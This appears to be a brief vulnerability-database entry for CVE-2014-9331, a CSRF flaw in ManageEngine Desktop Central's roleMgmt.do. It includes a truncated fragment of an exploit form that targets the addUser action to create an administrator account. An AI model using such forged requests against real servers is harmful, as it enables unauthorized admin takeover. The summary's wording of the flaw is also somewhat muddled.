CVE-2014-9331

CVE-2014-9331 affects ManageEngine Desktop Central. A CSRF in roleMgmt.do allows an authenticated admin to add an administrator via addUser, enabling account creation without proper validation. Affected: Desktop Central before 9 build 90130 (and related 9.x builds). Impact is hijacking admin auth...

ManageEngine Desktop Central 9 Build 90087 - CSRF Vulnerability

Exploit for jsp platform in category web applications :8020/STATEID/1417736606982/roleMgmt.do?actionToCall=addUser&SUBREQUEST=XMLHTTP" method="POST" input type="hidden" name="newDCAu...